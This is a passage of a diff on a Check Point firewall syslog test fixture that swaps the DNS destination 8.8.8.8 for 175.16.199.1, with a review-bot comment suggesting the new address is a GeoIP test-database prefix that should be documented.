logid:"0"; loguid:"{0x5e812cc9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523913"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35236"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:18:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cab,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523883"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40830"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:18:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cb5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523893"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53107"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:18:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cbf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523903"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55748"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:18:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cc9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523913"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35236"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:18:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; 
loguid:"{0x5e812cca,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cd3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523923"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56312"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cd3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523923"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56312"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e812cd4,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; description:"Contracts"; product:"Security Gateway/Management"; status:"Started"; update_service:"1"; version:"1.0"] <134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40116"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"194.29.39.10"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41646"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10858"; xlatesrc:"0.0.0.0"] 
@@ -6940,9 +6940,9 @@
 <134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40693"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:18:44Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; comment:"No update was found"; description:"Contracts"; product:"Security Gateway/Management"; status:"Finished"; update_service:"1"; version:"1.0"]
 <134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61180"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10860"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55039"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55039"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:18:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cde,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T23:19:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ce7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523943"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60281"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:19:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ce7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523943"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60281"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:19:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cea,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57980"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:19:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ced,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52357"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:19:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ced,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52358"; service:"443"; service_id:"https"; src:"192.168.1.117"]
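Review bot: 175.16.199.1, which the new side substitutes for 8.8.8.8 in the two replaced records of this hunk (and in the same way in the hunk above and the one below), is a publicly routable address rather than one from an RFC 5737 documentation range (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), so the reason for that particular value is not visible from the fixture itself. If the choice is dictated by the GeoIP test database the pipeline tests enrich against, a one-line note in the PR description or the fixture directory's README, e.g. `175.16.199.0/24 is a GeoIP test-DB prefix; keep it in sync with the expected-output file`, would stop the next editor from "correcting" it to a documentation address. On each replaced line only `dst` changes while `loguid`, `log_delay`, `s_port` and `src` stay identical, so the substitution looks mechanical and consistent; the matching expected-output file is not in this chunk, so whether it was regenerated cannot be confirmed here.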
@@ -6968,35 +6968,35 @@ <134>1 2020-03-29T23:20:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d31,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43646"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:20:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d31,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41144"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10866"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T23:20:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d32,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T23:20:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d4b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39331"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:20:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d4b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39331"; 
service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:20:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d53,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"] -<134>1 2020-03-29T23:20:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d55,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524053"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57589"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:21:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d5f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585524063"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45041"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:20:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d55,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585524053"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 